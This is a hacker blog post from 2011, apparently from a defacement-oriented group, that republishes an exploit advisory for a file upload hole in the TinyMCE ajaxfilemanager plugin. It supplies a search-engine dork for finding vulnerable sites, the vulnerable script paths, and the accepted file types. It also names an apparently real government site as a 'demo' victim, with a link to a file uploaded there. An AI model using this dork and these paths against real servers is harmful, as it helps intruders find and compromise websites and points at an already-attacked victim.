Followers

Tuesday, May 31, 2011

TinyMCE ajaxfilemanager Upload Vulnerability 

Web References:- 
http://packetstormsecurity.org/files/101793/
TinyMCE-AjaxFileManager-Shell-Upload.html
http://secunia.com/advisories/44760/
http://securityreason.com/wlb_show/WLB-2011050108


#########################################################
# Title : TinyMCE ajaxfilemanager Upload Vulnerability
# Author: Dr Trojan
# Greets to all my friends and everyone i know
 (www.paksecteam.com)
# Vendor: http://www.phpletter.com/Demo/
Tinymce-Ajax-File-Manager/
# Email : urduhack@gmail.com
# Date : 29/05/2011
# Dork : "tiny_mce/plugins/ajaxfilemanager"
# Category  : PHP [File Upload Vulnerability]
# Tested on: [Windows 7, Linux Ubuntu]
#########################################################
Exploit
# http://
[localhost]/[path]/jscripts/tiny_mce/plugins/
ajaxfilemanager/ajaxfilemanager.php
# http://
[localhost]/jscripts/tiny_mce/plugins/
ajaxfilemanager/ajaxfilemanager.php
# File Extention [.txt],[.jpg],[gif],[bmp]
Demo
http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/
ajaxfilemanager/ajaxfilemanager.php#
Preview
http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt

Posted by Dr Trojan at 5:09 PM  

Labels:

Artigos Relacionados:

Seja o primeiro a comentar

Post a Comment

Subscribe to: Post Comments (Atom)

Flags Counter

free counters

Background Mp3 Player

About Me

My Photo
Dr Trojan
Find Me On GooGle,Search UrduHack.
View my complete profile

Root@Paki -- Dr Trojan-H4x0rL1f3 -- © 2008 Template by Dicas Blogger.

TOPO